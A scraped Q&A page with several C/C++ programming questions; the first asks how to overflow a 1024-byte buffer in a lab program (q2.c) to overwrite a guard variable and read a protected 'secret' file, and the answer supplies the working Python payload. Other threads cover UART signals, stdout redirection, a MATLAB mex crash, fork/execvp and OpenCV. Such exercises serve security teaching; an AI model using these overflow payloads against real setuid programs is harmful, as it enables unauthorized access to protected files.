Buffer Overflow exploit in C - memory

Given below is the code from file q2.c
I need to use memory exploit to read the content of file 'secret' that has no read permission for my group.
I tried using ./q2 $(python -c 'print "\xad\xdd\xba"*1024 ') to get the output from file 'secret' (look line 28), but probably I did some mistake.
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <unistd.h>
int main(int argc, char **argv)
{
// the struct is used to ensure the loc variables are in the same order
// without struct, compiler can swap these around making expolit impossible
struct {
char buffer[1024];
volatile int changeme;
} locals;
locals.changeme = 0;
if (argc != 2) {
printf("Usage: q2 <some string>\n");
return 1;
}
// copy argument to the buffer
strcpy(locals.buffer, argv[1]);
// reveal the secret if "changeme" has been changed
if (locals.changeme == 0xbaddad) {
setreuid(geteuid(),getegid());
system("cat /home/q2/secret");
}
else {
printf("Try again!\n");
}
exit(0);
}

The problem occurs when you pass the arguments from the command:
$(python -c 'print "\xad\xdd\xba"*1024 ')
Here \xad\xdd\xba, actually takes 3 bytes so it becomes 3*1024 bytes. Also 1024 is not divisible by 3, if the buffer was of size 1023, then it would have work.
So instead of this try:
$(python -c 'print "\xab" * 1024 + "\xad\xdd\xba"')
It will fill the buffer with \xab, then for the next three bytes, it will fill the integer with the value you want.

Related

UART Interrupt problem while performing real-time image processing with camera by using opencv in c++ (I worked on Ubuntu 18.04, Linux Kernel 5x)

I write a code to process real time video by using camera. I can run this code within any error by itself but I want to implement a UART interrupt. Basically I aim that when I take a data from UART, other processes will be interrupted and after reading data, processes will be continue.
Here my UART interrupt implemented code.
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <fcntl.h>
#include <sys/signal.h>
#include <errno.h>
#include <termios.h>
#include <opencv2/opencv.hpp>
#include <iostream>
using namespace std;
using namespace cv;
void signal_handler_IO(int status);
VideoCapture vid("/dev/video0", CAP_V4L2);
int n;
int fd;
int connected;
struct termios termAttr;
struct sigaction saio;
const int fps = 20;
int main(int argc, char *argv[])
{
fd = open("/dev/ttyUSB0", O_RDWR | O_NOCTTY | O_NDELAY);
Mat frame;
if (fd == -1)
{
perror("open_port: Unable to open /dev/ttyO1\n");
exit(1);
}
saio.sa_handler = signal_handler_IO;
saio.sa_flags = 0;
saio.sa_restorer = NULL; //
sigaction(SIGIO,&saio,NULL);
fcntl(fd, F_SETFL, FNDELAY|FASYNC);
fcntl(fd, F_SETOWN, getpid());
tcgetattr(fd,&termAttr);
cfsetispeed(&termAttr,B9600);
cfsetospeed(&termAttr,B9600);
termAttr.c_cflag &= ~PARENB; // --> Parity Enable
termAttr.c_cflag &= ~CSTOPB; // -->two stop bit else one
termAttr.c_cflag &= ~CSIZE; // Character Size (C5, C6...)
termAttr.c_cflag |= CS8; // Charachter size 8 bit
termAttr.c_cflag |= (CLOCAL | CREAD);
//CLOCAL --> Ignore modem status lines. ¦ CREAD --> Enable receiver.
termAttr.c_lflag &= ~(ICANON | ECHO | ECHOE | ISIG);
termAttr.c_iflag &= ~(IXON | IXOFF | IXANY);
termAttr.c_oflag &= ~OPOST; // OPOST --> Post-process output
tcsetattr(fd, TCSANOW, &termAttr);
printf("UART1 configured....\n");
connected = 1;
if (!vid.isOpened())
{
return -1;
}
vid.set(CAP_PROP_FRAME_WIDTH, 1280);
vid.set(CAP_PROP_FRAME_HEIGHT, 720);
while (vid.read(frame))
{
imshow("webcam", frame);
if (waitKey(1000/fps) >= 0)
break;
}
destroyAllWindows();
vid.release();
close(fd);
exit(0);
}
void signal_handler_IO (int status)
{
printf("received data from UART.\n");
}
Now let's get to the main problem:
When I implement UART interrupt to this code, my captured video was stopped by the core (I takes Core Dumped Error). I guess that after process interrupted and when it will continue again, compiler is try to set again the video properties which I defined as
(vid.set(CAP_PROP_FRAME_WIDTH, 1280);)
(vid.set(CAP_PROP_FRAME_HEIGHT, 720);)
so I think I got such an error.
I think as I mentioned because when I deleted these size setting commands, code run very well with UART interrupt.
I try to define these commands globally but I cant do this. I take "vid does not name a type." error.
Thus, I can't solve this problem. I am not sure about why this problem occur and I don't know how it will be solved.
First, you cannot invoke printf(3) in a signal handler. Printf interacts with stdio, which in turn interacts with malloc(3); neither of these frameworks are signal safe. So, change your printf() to a write(2), which is safe.
That is unlikely to be your problem.
You didn't post the source to the implementation of vid, and in particular, how does vid.read deal with signals (ie EINTR)? Does it handle them correctly? Well? Perhaps return 0 if it is interrupted?
You will likely need to vet vid., so you should have a test candidate that gets a timer based signal over random intervals to gain confidence that it works.

Connecting stdout to stdin of the same process in Linux

I'm writing an app that (ab)uses an APL engine, libapl.so. The library contains a mechanism to allow me to capture results, but some stuff it dumps to stdout and stderr. So my question is, is there way a to capture stuff written to stdout rather than having it go to a screen, get piped to another process, or some such? Is there a way, for example, to connect stdout to stdin of the same process? I've tinkered with pipe2(), dup(2), and various bits of weirdness in GTK+/Glib, but I haven't hit the right incantation yet.
Did some more poking--at least one solution seems to be to create a fifo, open() it twice, once for reading, one for writing, and dup2() the writing fd to the stdout fd. This results in writes to stdout going through the fifo pipe where it can be read by the application. (Thanks for some inspiration by someone named Hasturkun, almost 7 years ago.)
Here's a bit of demo code:
#include <fcntl.h>
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>
int
main (int ac, char *av[])
{
char tname[64];
sprintf (tname, "/tmp/testpipe%d", (int)getpid ());
int rc = mkfifo (tname, 0666);
if (rc != 0) {
perror ("Creating fifo");
return 1;
}
int temp_in_fd = open (tname, O_NONBLOCK | O_RDONLY);
if (temp_in_fd < 0) {
perror ("Opening new input");
return 1;
}
int temp_out_fd = open (tname, O_NONBLOCK | O_WRONLY);
if (temp_out_fd < 0) {
perror ("Opening new output");
return 1;
}
FILE *temp_in = fdopen (temp_in_fd, "r");
if (!temp_in) {
perror ("Creating new input FILE");
return 1;
}
FILE *temp_out = fdopen (temp_out_fd, "w");
if (!temp_out) {
perror ("Creating new input FILE");
return 1;
}
dup2 (fileno (temp_out), STDOUT_FILENO);
printf("Woot!");
fflush(stdout);
#define BFR_SIZE 64
char bfr[BFR_SIZE];
ssize_t sz = fread (bfr, 1, BFR_SIZE, temp_in);
fprintf (stderr, "got %d bytes: \"%s\"\n", (int)sz, bfr);
fclose (temp_out);
fclose (temp_in);
unlink (tname);
return 0;
}

matlab stops working when getting printf order from a mex file

i am new to C++ and coding
how ever i attemped to make a mex file to use in matlab
the mex file has a problem for printing a parameter
i have sent the error picture
the code also is as below
`#include <windows.h>
#include <mex.h>
#include <stdio.h>
#include <conio.h>
#include <string.h>
#include <stdint.h>
#include "./mavlink/v1.0/common/mavlink.h" //MAV_CMD_COMPONENT_ARM_DISARM is just defined
#include "C:\Users\SONY\Documents\Visual Studio 2010\Projects\code_test_2/inttypes.h"
#define STRICTfstat
#define WIN32_LEAN_AND_MEAN
#define CALL_TYPE_INIT 0
#define CALL_TYPE_CODE 1
#define CALL_TYPE_DECODE 2
#define CALL_TYPE_ARM 3
#define CALL_TYPE_DISARM 4
#ifndef MAV_CMD_COMPONENT_ARM_DISARM
#define MAV_CMD_COMPONENT_ARM_DISARM 400
#endif
unsigned char buf[4096]; // we put send and recive data in it enshaallah
int receive_chan = 0;
int system_id = 0;
int component_id = 0;
int APM_Sys_ID=0; // we use it instead of target sys ID
int APM_Comp_ID=0; // we use it instead of target component ID
mavlink_status_t status_copy;
mavlink_heartbeat_t system_heart_beat;
mavlink_message_t msg;
mavlink_attitude_t attitude; // it specifies the type of attitude. it says attitude is a data of type mavlink_attitude (hosein)
mavlink_rc_channels_raw_t rc_channels_raw;
void mexFunction(
int nlhs,
mxArray *plhs[],
int nrhs,
mxArray *prhs[]
)
{
double *CALL_TYPE = mxGetPr(prhs[0]);
if (*CALL_TYPE == CALL_TYPE_CODE){
uint16_t chan1_raw,chan2_raw,chan3_raw,chan4_raw,chan5_raw,chan6_raw,chan7_raw,chan8_raw;
printf("salam\n");
double *Actuators = mxGetPr(plhs[1]); // here we get the Actuators value which is prepared in matlab (it is sent from matlab to visula studio)
chan1_raw=1000*Actuators[0+8*0]+1000;
//chan2_raw=1000*Actuators[1+8*0]+1000;
//chan3_raw=1000*Actuators[2+8*0]+1000;
//chan4_raw=1000*Actuators[3+8*0]+1000;
//chan5_raw=1000*Actuators[4+8*0]+1000;
//chan6_raw=1000*Actuators[5+8*0]+1000;
//chan7_raw=1000*Actuators[6+8*0]+1000;
//chan8_raw=1000*Actuators[7+8*0]+1000;
/*mavlink_msg_rc_channels_override_pack(
system_id,
component_id,
&msg,//msg is out put and it is the way mavlink has determined and ali has no role on it
APM_Sys_ID,//we replaced target_system with APM_Sys_ID (this is the change we made in original code)
APM_Comp_ID,
chan1_raw,
chan2_raw,
chan3_raw,
chan4_raw,
chan5_raw,
chan6_raw,
chan7_raw,
chan8_raw);
*/
printf("% PRIu16\n",chan1_raw);
//printf("%i",chan2_raw);
//printf("%i",chan3_raw);
//printf("%i",chan4_raw);
//printf("%i",chan5_raw);
//printf("%i",chan6_raw);
}
}`
so please give me help for solving this problem if it is possible

fork variables randomly change

I want to use execvp to run commands through my program. The user is prompted for a command (exits on eof).
Once the program has a command it forks a child process to process the command while the parent waits for the child to finish.
I'm tokenizing the input to store it in a char* array which is kept track of by variable 'i'.
Except 'i' keeps changing its value with each iteration of the while loop.
sample input: /bin/ls -l
#include <stdio.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>
#include <string.h>
#define BUFFER 1024
int main(){
pid_t p;
char* paramList[] = {};
char input[BUFFER];
int i = 0;
char* segments;
printf(">");
while(fgets(input, BUFFER, stdin) != NULL){
if((p = fork()) == 0){
printf("Executing: %s\n", input);
i = 0;
segments = strtok(input, " ");
paramList[i] = segments;
printf("%s%d\n", paramList[i], i);
i++;
while(segments != NULL){
segments = strtok(NULL, " ");
paramList[i] = segments;
printf("%s%d\n", segments, i);
i++;
}
paramList[i] = NULL;
execvp(paramList[0], paramList);
}else{
printf(">");
waitpid(p, NULL, 0);
}
}
return 0;
}
You're not declaring a size for paramList, but you're giving it an empty initializer list; thus paramList has zero elements. And then you're writing more than zero elements into it, overflowing onto other local variables (like i).

Assertion error with imshow

OK, i know this question may not be new and I've already gone through a few posts covering the same issue but it hasn't really helped. I am new to opencv and I am trying to load an image (in a folder that's different from the one where the executable file's stored) using imread and display it using imshow. Its the part of a much bigger code but I've shown the part that covers the issue as a separate code here:
#include <stdio.h>
#include "cv.h"
#include "cvaux.h"
#include "highgui.h"
#include "opencv2/highgui/highgui.hpp"
#include "opencv2/core/core.hpp"
#include <iostream>
#include "opencv2/contrib/contrib.hpp"
#include "opencv2/highgui/highgui_c.h"
#include "opencv/highgui.h"
#include "opencv2/objdetect/objdetect.hpp"
#include "opencv2/imgproc/imgproc.hpp"
#include "opencv2/imgproc/imgproc_c.h"
#include "opencv2/legacy/legacy.hpp"
#include <fstream>
#include <sstream>
#include <cctype>
#include <iterator>
#include <cstring>
#include <highgui.h>
#include <string.h>
int disp(char * filename);
using namespace std;
using namespace cv;
int main()
{
disp("file.txt");
}
int disp(char * filename)
{
FILE * fp;
char shr[50];
char ch;
if( !(fp = fopen(filename, "rt")) )
{
fprintf(stderr, "Can\'t open file %s\n", filename);
return 0;
}
for(i=0;ch != '\n';i++)
{
ch = fgetc(imgListFile);
shr[i] = ch;
}
string str(shr);
Mat image=imread(str.c_str(),1);
namedWindow( "Display Image", CV_WINDOW_AUTOSIZE );
imshow( "Display Image",image);
cvWaitKey(0);
}
The "file.txt" is a text file containing the full path of the image i want to load and display. I am reading it into a character array, converting it to a string and passing it to the imshow/imread functions. I am not getting any errors while compiling, however, i am getting an error while i run the code:
OpenCV Error: Assertion failed (size.width>0 && size.height>0) in imshow, file /home/ubuntu/Desktop/OpenCV/opencv-2.4.6.1/modules/highgui/src/window.cpp, line 261
terminate called after throwing an instance of 'cv::Exception'
what(): /home/ubuntu/Desktop/OpenCV/opencv-2.4.6.1/modules/highgui/src/window.cpp:261: error: (-215) size.width>0 && size.height>0 in function imshow
Aborted (core dumped)
I tried debugging the code, even re-compiled opencv; but i am getting the same issue again & again. I need help !!!
Hope i've explained my issue properly. Thanks in advance !!!
P.S: The text file actually contains a number before every image path; and i need to remove the number before i can feed the path to the imshow/imread functions; that's the reason i am trying to read the text file and store in a character array (so that i can get rid of the first 2 characters first).
The error message tells you that the image a 0 rows and/or 0 columns. This is usually caused by an incorrect path to image, or by an an image type that is not handled by your installation of OpenCV.
To debug it, you need to print out the argument of imread() and compare it with the catual location of the file on your system.
your for loop here is broken:
for(i=0;ch != '\n';i++)
{
ch = fgetc(imgListFile);
// you have to check the value of ch *after* reading
if ( ch == '\n' )
break; // else, you still append the '\n' to your filename
shr[i] = ch;
}
// z terminate
shr[i] = 0;
so, - you get empty images because of broken path.
There are some typos in your code. Also, it appears as if you haven't completely grasped the concepts of file handling and string allocations using c++; I would advise you to read up on those.. I have re-written your code as follows,
int main()
{
disp("file.txt");
return EXIT_SUCCESS;
}
void disp(char* filename)
{
ifstream myReadFile;
char shr[500];
myReadFile.open(filename);
if(myReadFile.is_open())
while(!myReadFile.eof())
myReadFile >> shr;
string str(shr);
Mat image=imread(str.c_str(),1);
namedWindow( "Display Image", CV_WINDOW_AUTOSIZE );
imshow( "Display Image",image);
cvWaitKey(0);
}
Hope this helps.

Resources